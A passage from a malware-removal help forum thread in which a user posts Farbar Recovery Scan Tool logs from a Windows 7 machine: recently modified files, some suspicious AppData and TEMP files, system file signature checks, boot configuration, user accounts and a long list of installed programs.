2017-12-22 15:07 - 2017-07-22 06:55 - 000003834 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1500706514
2017-12-22 15:07 - 2017-07-22 06:53 - 000000000 ____D C:\Program Files\Opera
2017-12-22 15:05 - 2009-07-14 05:13 - 000795934 _____ C:\Windows\system32\PerfStringBackup.INI
2017-12-21 15:28 - 2016-09-27 15:50 - 000000000 ____D C:\ProgramData\Package Cache
2017-12-21 13:01 - 2017-01-17 02:00 - 000000000 ____D C:\Users\Sblck\AppData\Local\Adobe
2017-12-21 13:01 - 2016-09-27 09:24 - 000000000 ____D C:\Users\Sblck
2017-12-21 03:18 - 2016-10-02 18:04 - 000004478 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-12-20 23:24 - 2016-09-27 18:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\discord
2017-12-20 23:13 - 2016-10-05 15:12 - 000000000 ____D C:\Users\Sblck\Documents\Adobe
2017-12-20 23:13 - 2016-09-27 09:24 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Adobe
2017-12-20 23:10 - 2016-10-05 15:11 - 000000000 ____D C:\Program Files\Common Files\Adobe
2017-12-20 18:09 - 2016-09-28 16:45 - 000000000 ____D C:\Windows\Minidump
2017-12-20 18:07 - 2017-06-07 06:34 - 000000000 ____D C:\Program Files\Adobe
2017-12-20 17:52 - 2016-10-02 18:04 - 000000000 ____D C:\ProgramData\Adobe
2017-12-20 17:46 - 2016-10-02 18:04 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-12-20 12:32 - 2009-07-14 05:08 - 000032608 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-12-20 01:31 - 2017-07-19 18:22 - 001065984 _____ C:\Users\Sblck\AppData\Local\file__0.localstorage
2017-12-20 00:08 - 2017-06-04 00:00 - 000000000 ____D C:\Users\Sblck\ansel
2017-12-19 03:42 - 2017-02-03 21:58 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\TeamViewer
2017-12-19 01:10 - 2017-03-06 00:19 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Origin
2017-12-18 21:41 - 2016-10-02 20:10 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\qBittorrent
2017-12-16 20:38 - 2016-09-28 20:29 - 000000000 _____ C:\Windows\SysWOW64\Access.dat
2017-12-16 20:30 - 2016-10-13 14:54 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\SmartSteamEmu
2017-12-15 22:16 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\system32\NDF
2017-12-11 22:45 - 2016-09-27 18:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\Discord
2017-12-11 13:44 - 2017-09-25 01:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-12-11 13:43 - 2017-09-25 01:22 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-12-10 15:35 - 2016-12-28 03:46 - 000000000 ____D C:\Users\Sblck\AppData\Local\UnrealEngine
2017-12-10 02:42 - 2017-09-13 13:12 - 000000000 ____D C:\ProgramData\EA Logs
2017-12-10 02:32 - 2016-09-28 09:19 - 000000000 ____D C:\Users\Sblck\Documents\My Games
2017-12-09 20:28 - 2017-09-13 13:29 - 000348360 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-12-09 20:28 - 2017-09-13 13:01 - 000348360 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2017-12-09 20:27 - 2017-09-13 13:01 - 000280904 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-12-08 21:58 - 2016-09-27 09:59 - 000002194 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-12-06 22:48 - 2016-10-04 20:57 - 000004514 _____ C:\Users\Sblck\AppData\Roaming\VoiceMeeterDefault.xml
2017-12-06 22:48 - 2016-10-04 20:46 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VB Audio
2017-12-06 22:48 - 2016-10-04 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VB Audio
2017-12-06 22:48 - 2016-10-01 23:30 - 000000000 ____D C:\Program Files\VB
2017-12-03 23:50 - 2016-11-21 19:26 - 000000000 ____D C:\Antonio PIXELMON SV
2017-12-03 16:34 - 2017-09-25 02:19 - 000000000 ____D C:\Users\Sblck\Documents\4A Games
2017-12-03 16:20 - 2017-09-25 02:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\4A Games
2017-12-01 17:18 - 2016-09-27 20:44 - 000000000 ____D C:\Windows\SysWOW64\directx
2017-11-30 19:38 - 2017-09-25 17:08 - 000000000 ____D C:\Users\Sblck\AppData\Local\CyberGhost
2017-11-29 13:32 - 2016-10-02 18:04 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-11-28 19:42 - 2016-09-28 14:43 - 000000000 ____D C:\Users\Sblck\AppData\Local\ARK_Server_Manager

==================== Files in the root of some directories =======

2017-01-15 22:50 - 2017-01-15 22:50 - 000000001 _____ () C:\Users\Sblck\AppData\Roaming\EDCSSU
2016-10-04 20:57 - 2017-12-06 22:48 - 000004514 _____ () C:\Users\Sblck\AppData\Roaming\VoiceMeeterDefault.xml
2017-03-07 21:12 - 2017-11-26 13:57 - 000001456 _____ () C:\Users\Sblck\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-12-28 02:22 - 2017-12-28 02:22 - 000002621 _____ () C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002584 _____ () C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002621 _____ () C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs
2017-07-19 18:22 - 2017-12-20 01:31 - 001065984 _____ () C:\Users\Sblck\AppData\Local\file__0.localstorage
2017-04-14 12:52 - 2017-04-14 12:52 - 000000093 _____ () C:\Users\Sblck\AppData\Local\fusioncache.dat
2017-12-28 02:08 - 2017-12-28 02:08 - 000000029 _____ () C:\Users\Sblck\AppData\Local\MCconfig.dll
2016-10-31 20:24 - 2017-12-28 06:48 - 000007594 _____ () C:\Users\Sblck\AppData\Local\Resmon.ResmonCfg
2008-02-05 13:28 - 2008-02-05 13:28 - 000000051 _____ () C:\Users\Sblck\AppData\Local\setup.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000938008 _____ () C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt
2017-12-28 02:08 - 2017-12-28 02:22 - 000001757 _____ () C:\Users\Sblck\AppData\Local\x
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ () C:\Users\Sblck\AppData\Local\XML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001760 _____ () C:\Users\Sblck\AppData\Local\xx
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ () C:\Users\Sblck\AppData\Local\XXML.txt

Some files in TEMP:
====================
2017-12-20 20:29 - 2017-12-20 20:29 - 000000180 _____ () C:\Users\Sblck\AppData\Local\Temp\00e481b5e22dbe1f649fcddd505d3eb7.dll
2017-12-20 20:29 - 2017-12-27 21:55 - 000000016 _____ () C:\Users\Sblck\AppData\Local\Temp\17f3d3f36f1eb4b5d78cb5105d79e79b.dll
2017-08-31 14:57 - 2017-12-28 15:33 - 000192512 _____ () C:\Users\Sblck\AppData\Local\Temp\sfamcc00001.dll
2017-11-24 23:03 - 2017-12-20 20:50 - 000192512 _____ () C:\Users\Sblck\AppData\Local\Temp\sfamcc00002.dll
2017-12-28 15:21 - 2017-12-28 15:33 - 000158720 _____ () C:\Users\Sblck\AppData\Local\Temp\sfareca00001.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume2
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
default                 {current}
resumeobject            {91609040-84de-11e6-8163-c5f4123f7208}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 7
locale                  en-US
inherit                 {bootloadersettings}
testsigning             No
osdevice                partition=C:
systemroot              \Windows
resumeobject            {91609040-84de-11e6-8163-c5f4123f7208}
quietboot               Yes
debug                   No

Resume from Hibernate
---------------------
identifier              {91609040-84de-11e6-8163-c5f4123f7208}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=\Device\HarddiskVolume2
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 Yes

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}


LastRegBack: 2017-12-22 05:25

==================== End of FRST.txt ============================


#5 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 11:22 AM

Also  Addition.txt
 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-12-2017
Ran by Sblck (28-12-2017 16:03:00)
Running from F:\Desktop\DesktopC
Windows 7 Ultimate Service Pack 1 (X64) (2016-09-27 09:23:29)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2661263523-112610016-3866790350-500 - Administrator - Disabled)
Guest (S-1-5-21-2661263523-112610016-3866790350-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2661263523-112610016-3866790350-1006 - Limited - Enabled)
Sblck (S-1-5-21-2661263523-112610016-3866790350-1000 - Administrator - Enabled) => C:\Users\Sblck

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 10.0.390.0 (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET NOD32 Antivirus 10.0.390.0 (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 17.00 beta (x64) (HKLM\...\7-Zip) (Version: 17.00 beta - Igor Pavlov)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Adobe After Effects CC 2018 (HKLM-x32\...\AEFT_15_0_0) (Version: 15.0.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Adobe Flash Player 26 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 26.0.0.137 - Adobe Systems Incorporated)
Adobe Flash Player 26 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 26.0.0.137 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2018 (HKLM-x32\...\AME_12_0_0) (Version: 12.0.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_1_1) (Version: 18.1.1 - Adobe Systems Incorporated)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.13 - Michael Tippach)
Audacity 2.1.2 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.2 - Audacity Team)
AutoHotkey 1.1.26.00 (HKLM\...\AutoHotkey) (Version: 1.1.26.00 - Lexikos)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.26.4 - Bethesda Softworks)
Beyond Good and Evil (HKLM-x32\...\Uplay Install 232) (Version:  - Ubisoft)
BioShock 2 Remastered (HKLM-x32\...\BioShock 2 Remastered_is1) (Version:  - )
BioShock Remastered (HKLM-x32\...\BioShock Remastered_is1) (Version:  - )
BitRaider Streaming Client (HKLM-x32\...\BitRaider Streaming Client) (Version: 1.3.3.4098 - BitRaider, LLC)
BlueStacks 3 (HKLM-x32\...\BlueStacks) (Version: 3.7.44.1625 - BlueStack Systems, Inc.)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Core Temp 1.3 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.3 - ALCPU)
CPUID CPU-Z 1.77 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Crazybump (remove only) (HKLM-x32\...\Crazybump) (Version:  - )
Creation Kit: Fallout 4 (HKLM-x32\...\Creation Kit: Fallout 4) (Version:  - Bethesda Softworks)
CyberGhost 6 (HKLM\...\CyberGhost 6_is1) (Version:  - CyberGhost S.A.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0196 - Disc Soft Ltd)
Discord (HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Discord) (Version: 0.0.299 - Discord Inc.)
EAX4 Unified Redist (HKLM-x32\...\{89661B04-C646-4412-B6D3-5E19F02F1F37}) (Version: 4.001 - Creative Labs)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
ESET NOD32 Antivirus (HKLM\...\{FC6250CE-D271-4A2E-AFCC-59D2BFA29795}) (Version: 10.0.386.0 - ESET, spol. s r.o.)
Fallout 4 DDS Image Viewer (HKLM-x32\...\{200E4E99-8D0E-4575-A401-955C13BB5F0B}) (Version: 1.2 - Sir Garnon)
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Geeks3D FurMark 1.19.0.0 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version:  - Geeks3D)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 63.0.3239.84 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Guitar Pro 6 (HKLM-x32\...\{14A487F2-1259-4E6C-AE3C-3C888DDBCB60}_is1) (Version:  - Arobas Music)
Gyazo 3.3.5 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc.)
HD Tune Pro 5.70 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
Heaven Benchmark version 4.0 (HKLM-x32\...\Unigine Heaven Benchmark (Basic Edition)_is1) (Version: 4.0 - Unigine Corp.)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HP Deskjet 3520 series Basic Device Software (HKLM\...\{A0A03B53-927D-4454-A456-CB0A72A4912F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Deskjet 3520 series Product Improvement Study (HKLM\...\{14ABDFC2-491B-4AF0-8134-CC5596D0EF57}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Deskjet 3520 series Setup Guide (HKLM-x32\...\{AEEDCEB7-00B8-4BE1-B492-AB04803D5F1E}) (Version: 27.0.0 - Hewlett Packard)
HWiNFO64 Version 5.56 (HKLM\...\HWiNFO64_is1) (Version: 5.56 - Martin Malík - REALiX)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.12.1498 - Intel Corporation)
Intel(R) Network Connections 17.3.63.0 (HKLM\...\PROSetDX) (Version: 17.3.63.0 - Intel)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.5.0.1026 - Intel Corporation)
Java 8 Update 144 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
K-Lite Mega Codec Pack 13.2.4 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.2.4 - KLCP)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
League of Legends (HKLM-x32\...\{2A3DD76D-BB24-4C4B-BC36-FB25D8902946}) (Version: 4.1.2 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
LOOT version 0.11.0 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.11.0 - LOOT Team)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Mass Effect™ 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.2.1604.0 - Electronic Arts)
MATLAB R2017a (HKLM\...\Matlab R2017a) (Version: 9.2 - MathWorks)
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3154529) (HKLM\...\{5B71B4F6-A412-3C48-B332-0FA9B9958940}) (Version: 4.6.01081 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649 (HKLM-x32\...\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
MorphVOX Pro (HKLM-x32\...\{76828C87-C612-4329-843B-4DB58060030A}) (Version: 4.4.9 - Screaming Bee)
Mozilla Firefox 53.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 en-US)) (Version: 53.0 - Mozilla)
MSI Afterburner 4.4.0 (HKLM-x32\...\Afterburner) (Version: 4.4.0 - MSI Co., LTD)
NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version:  - NCSOFT)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 7 - Notepad++ Team)
NV:MP (HKLM-x32\...\{3FAA6664-C4C1-4754-8D5F-2B7C621E9297}) (Version: 1.0 - NV:MP Team)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 388.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.59 - NVIDIA Corporation)
NVIDIA Graphics Driver 388.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation)
NVIDIA Photoshop Plug-ins 64 bit (HKLM-x32\...\{5E386C5B-CDE7-435A-B5C9-EC73A1B0553A}) (Version: 8.50 - )
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 19.0.3 - OBS Project)
Opera Stable 49.0.2725.64 (HKLM-x32\...\Opera 49.0.2725.64) (Version: 49.0.2725.64 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 10.5.8.11002 - Electronic Arts, Inc.)
Ozone Neon 3K Driver (HKLM-x32\...\{FA367E43-1B7B-45B2-80DC-8FEF62F4A929}) (Version: 1.0 - Ozone Gaming)
PC Remote (HKLM-x32\...\{C934DF74-D0D9-445C-90AA-34012A04E11D}) (Version: 3.51 - PC Remote)
Peace (HKLM\...\Peace) (Version: 1.4.2.3 - P.E. Verbeek)
Planetbase (HKLM-x32\...\1351624781_is1) (Version: 1.2.3 - GOG.com)
Plants vs. Zombies™ (HKLM-x32\...\{5E6536C2-E79A-49CF-83EA-817AD81F9FC8}) (Version: 1.2.0.1093 - Electronic Arts, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
qBittorrent 3.3.10 (HKLM-x32\...\qBittorrent) (Version: 3.3.10 - The qBittorrent project)
QuickSFV (Remove only) (HKLM\...\QuickSFV) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.32.0 - Renesas Electronics Corporation) Hidden
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.32.0 - Renesas Electronics Corporation)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.0.0.790 - Samsung Electronics)
ScpToolkit (HKLM\...\{1EA84ED4-28D4-4836-BF8B-0E31BF1704C5}) (Version: 1.7.277.16103 - Nefarius Software Solutions)
SD Card Formatter (HKLM-x32\...\{10C16E01-F739-4093-89A7-E570589FA0F6}) (Version: 5.0.0 - SD Association)
Sid Meier's Civilization V (HKLM-x32\...\steam app 8930) (Version:  - 2K Games, Inc.)
Skype Web Plugin (HKLM-x32\...\{EB96DF8B-65A7-4E72-BFB1-38DB36870D16}) (Version: 7.32.6.278 - Skype Technologies S.A.)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.17.2.201702091525 - Sony Mobile Communications Inc.)
Sophos Management Communications System (HKLM-x32\...\{2C14E1A2-C4EB-466E-8374-81286D723D3A}) (Version: 4.3.2.1 - Sophos Limited)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spore (HKLM-x32\...\Spore_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Spore™ (HKLM-x32\...\{4BDCC41C-FFE7-40a4-BCB6-B558916868F7}) (Version: 1.7.0.0 - Electronic Arts)
Star Wars The Old Republic (HKLM-x32\...\swtor_swtor) (Version: 13.0.0.13 - Bioware/EA)
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
